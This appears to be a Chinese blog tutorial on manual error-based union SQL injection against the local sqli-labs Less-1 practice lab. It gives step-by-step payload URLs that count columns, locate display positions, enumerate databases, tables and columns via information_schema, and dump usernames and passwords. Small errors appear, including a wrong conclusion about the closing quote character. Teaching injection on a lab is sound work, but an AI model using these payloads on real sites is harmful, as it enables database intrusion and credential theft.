- 1这个防火墙实验配置案例,堪称模板!_如何简单配置防火墙
- 2AES加密算法详解(图文解释)
- 32024年最全Google 面试六轮游,结果还是没过!Google面试真题分享,2024金九银十面试季
- 4为Atmega328P定制bootloader 添加自己的板卡到Arduino IDE
- 5Python: ImportError: Bad git executable_import error bad git
- 6华为HCIA认证考试简介_hcia考试
- 7Caused by: org.springframework.amqp.AmqpException: No method found for class [B
- 8这10款VS Code神仙插件,嵌入式程序员必备_vs插件
- 9夜神模拟器连接AndroidStudio_夜神模拟器怎么连as
- 10数据统计与分析基础 实验四 机器学习算法建模与求解
WEB安全基础 - - -SQL注入利用_sql 注入判断闭合
赞
踩
目录
GET显错注入
GET显错注入流程
01 获取字段数 order by x02 获取显示位 union select 1,2,3,4……03 获取数据库信息 version() , user() , @@datadir04 获取当前数据库 database() , schema() ,05 获取所有数据库06 获取数据库表07 获取所有字段08 获取数据
准备知识
逻辑运算符: and 、 or 、 !=注意:!!!and :并且,前后两条语句必须全为真,才为真,否则为假。如:1=1 and 2=2 真1=1 and 1=2 假or :或者,前后两条语句一条为真,就为真。!= :不等于。
--+ 注释符limit 0,1 从你表中的第一个数据开始,只读取一个order by 排序,判断字段数量,也就是表的列数union select 联合查询,连接前面语句,起着合并查询的作用group_concat 合并多行数据到一行version() 当前数据库版本database() 当前数据库@@datadir 数据库数据路径@@version_compile_os 操作系统版本
举例:基于错误的GET单引号字符型注入
1.判断注入点
http://127.0.0.1/sqli/Less-1/?id=1
2.判断闭合字符
http://127.0.0.1/sqli/Less-1/?id=1’
输入单引号 ‘ 出现报错信息
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1您的SQL语法有错误;请查看与您的MySQL服务器版本对应的手册,以了解要在第1行的“”1“”限制0,1“”附近使用的正确语法
可以看出1’被1"引用,所以对应的字符应该为"
进行and逻辑测试
http://127.0.0.1/sqli/Less-1/?id=1’ and 1=1 --+
3.根据order判断sql语句的查询列数
http://127.0.0.1/sqli/Less-1/?id=1' order by 5 --+
报错为:Unknown column '5' in 'order clause'
“Order子句”中的未知列“%5”
从 5向下一词尝试,最终得到正确列数为3
http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+
4.联合查询活得显示位
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+
5.获取当前数据库
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select database()),3 --+
6.获取所有数据库
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata --+
7. 获取当前数据库表名:
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
8.获取users表所有字段:
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users‘ --+
9. 获取security.users表所有字段
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema='security'--+
10.获取security.users表所有字段内容:
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(username,':',password) from users --+
